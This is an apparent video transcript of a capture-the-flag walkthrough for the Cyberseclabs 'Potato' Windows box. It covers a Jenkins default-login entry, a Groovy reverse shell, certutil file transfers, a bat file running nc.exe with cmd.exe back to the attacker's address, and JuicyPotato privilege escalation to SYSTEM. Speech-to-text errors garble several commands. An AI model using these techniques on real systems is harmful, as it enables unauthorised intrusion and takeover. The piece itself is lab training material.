Hello guys, welcome to the channel the Amazicellent Hacker. Today I'm going to solve the box potato from Cyberseclabs. So Cyberseclabs is kind of a new website that hosts vulnerable machines to practice your hacking skills. Okay, before getting into the walkthrough, please don't forget to subscribe to the channel and hit the bell icon. Okay, I'm in the site cyberseclabs.co.uk and I have already started the instance of this box potato, and here is our machine's IP. So I'm going to quickly show you how to solve this box. Okay, let's start our walkthrough by scanning the box with nmap. Okay, let me copy the IP first. So to perform an nmap scan, let's type sudo nmap-a. So this -a flag will just enable OS detection, version detection, script scanning, and trace route, and gives the machine IP. And then let's start the scan process. So it will take some time to complete the scan. I'm just going to stop here and just get the scan results. As you can see that port 135, port 139, 445, 3389, 8080 are all the ports that are opened in this box. Okay, let's start the enumeration with port 8080 as it is HTTP port. Just open your browser, paste the IP and give the port number. It's 8080. Let's open the site first. So it's a Jenkins site and it asks for username and password. There's nothing else in here. Let's try some default credentials. Admin. If not, then we are going to perform some brute forcing. I think we successfully got inside this Jenkins dashboard or admin page. So actually the password was just default admin and admin. Let's try to get a reverse shell. First, let's set up a netcat listener in your attacking box and set as nvlp and give any port number. I'll use 4444. And now it's listening. So where we can upload a reverse shell. Okay, let's check. I think it's in this script console. So go to manage, just click on manage Jenkins and scroll to the bottom and just go to this script console. I think here is some sort of input page. So you can see here that it asks you to type in an arbitrary groovy script and execute it on server. Okay, let's search in Google for groovy reverse shell. Groovy reverse shell. So I'm going to click the first link. It's GitHub link. So it's some sort of groovy code. Okay, let's copy this reverse shell to paste it in here. Next, what we are going to do is just change our IP and port number. Okay, let's first check what is our IP. So it's 1010 to 118. Let's change this string that host to our IP address 1010 to 118. So our listening port was 4444. That's correct. Okay, now let's check if we can get a reverse shell or not. Okay, we successfully got inside this box and potato. Let's search for access flag. Let's check in desktop. Okay, so here is our access.txt file. So it is our access flag. So this uh, give type and access.txt. It will just output this access.txt file. So here we go. Okay, now let's get to privilege escalation path. Okay, after some enumeration, I just found out that uh, this current user Ben has some misconfigured rights. So you can just check it by typing whoami slash and priv. So as you can see here that this user has this impersonate a client after authentication. So this privilege name is impersonate privilege and it's enabled in this box. So it's a famous vulnerability in Windows. You can just source this in Google also and easily find exploit. So sourcing this SE impersonate privilege escalation Windows 10 in Google, it just gave me a exploit name. It's Juicy Potato. So this Juicy Potato is a famous exploit. So it's like Dirty Cow for Linux. So let me show you how to use this Juicy Potato exploit to exploit this box. Let me first of all download an exe file. Okay, so here is a GitHub link and you can easily find it in this github.com osp slash juicy dash potato slash villages. So here is our exe file. So I'm just going to download it using wget. Wget juicy potato. So you can see that I successfully downloaded this juicy potato.exe file in my Paradise. So what I'm going to do now is just transfer this juicy potato.exe file from my Paradise to this vulnerable Windows box. Okay, so to download this juicy potato.exe file from my attacking OS to this vulnerable box, what I'm going to do is I'm going to set up a simple HTTP server, Python server. To do that, just type sudo python free http.server and give a port number. So it's dash m for module. Okay, now I started HTTP server on this port 9999. Then download it. So let me first of all go to my home directory. Okay, so I'm in this directory, C users and Ben. Okay, I'm going to download this juicy potato.exe in this folder. To do that, just type sort util. You can just use PowerShell also. I tried a couple of times with PowerShell, it didn't work in this box. So I'm going to just use classic mechanism. So it's a whole command line utility. Sort util URL cache dash f for file. So it is serving on double quote http 10.10 to 118 port 9999 and file name juicy potato.exe. Okay, I think it's the correct syntax, and we're just going to name it or outfile it as pod.exe. Okay, let's run it. Okay, I think it's downloading. So here is our exe file. So now I'm going to show you what I'm going to do for privilege escalation. Just search for Juicy Potatoes GitHub page. So you can also see here how it works. So it abuses the golden privileges. So in our case, the golden privilege is just impersonating other user. So there is a usage also. You can see here that it runs the potato.exe and dash L listening flag to any port and dash P to run this program. So it is running this Windows system.cmd.exe. So you can see the usage in here, or you can simply run this command pod.exe that we just downloaded. So here are all the flags or mandatory arguments that we need to supply. So dash T to create a process call, and dash P to launch a program, and dash L to listen on some port. So what I'm going to do is I'm going to set up another netcat listener in my box. I'm going to download netcat in this vulnerable Windows box and just use this juicypotato.exe file to run that netcat, and hopefully we'll get a escalated netcat session in our box. So first of all, what I need to do is just download a netcat. Let's first check what is my system. So it's Windows Server 2012. And a 64-bit window version. Okay, so let me first download netcat.exe in my box. Search in Google for nc.exe. So I'm just going to download 64-bit version of netcat. So here is our exe file. And say 64.exe. Okay, I'm gonna save it in the box. So here is our netcat. Now I'm again going to transfer this netcat from my ParrotOS to this Windows. Okay, we're going to just use the same command. Sort. Let me zoom it a little bit. Sort util surl cache dash f for file http 10.10.2.118 port number 9999 and c 64.exe. I'll file it as nc.exe. Okay, now I successfully downloaded this netcat in this Windows box also. So now I'm going to write a bat file which will run this netcat reverse shell. I'm going to use echo, then nc.exe. Let me specify full path. Users, then nc.exe dash ecmd.exe. Then my machine's IP 1010 to 118, and the ports I will be listening on, so I'll be just listening on this port 1111. So let's name the bat to rep.exe or rep.bat. Okay, let's check it. I think it's the correct one. I kind of need to remove this double quote, I think, so I'm just going to make it again, echo rep.bat. Okay, now I just remove the double quote. Next, let's set up a netcat list now. nc dash nvlp import 1111. So now my box is listening. So now let's use this pod.exe or juicy potato.exe file. Pod.exe dash G to create a process call. So I'm going to just use a wildcard name, and dash L to listen on port. So I'll just listen on any port, just give a random port number. So I'll just give this port 6666. After that, that's P for program to run. So it will run this bat file that I just created. User ben and rep.bat. Let's check the GitHub again. Okay, we also need to provide the CLS ID. So dash C flag will just give the CLS ID value. I think the CLS ID value are just given in this GitHub page for Juicy Potato. Okay, here it is. So as you already know that our box is this Windows Server 2012. Let's click on that. Let's just copy this first one. So it run as this anti-authority system. We are just going to copy or impersonate this user. So anti-authority system. So that's the user that we are going to impersonate. Okay, that's C flag. Let's paste it. Okay, let's try to run it. Okay, it's successfully completed, and I think we got our reversal. Let's check. Okay, now we are the root user anti-authority. So you can see here that who am I to say that we are authority anti-authority system. So we successfully escalated the privilege in this box. So to get the root flag, let's go to C users administrator desktop. So there is a system.text or system.text flag, a system flag. Okay, so we got both system access flag as well as system flag and successfully completed this box. It was pretty easy box, but kind of long. How to use how to just transport file from Linux to Windows box using shortUtil, as well as how to use Juicy Potato to escalate the privilege in Windows. So this much in this video. Hope to see you in the next one, and please don't forget to subscribe to the channel and hit the bell icon. Okay, bye.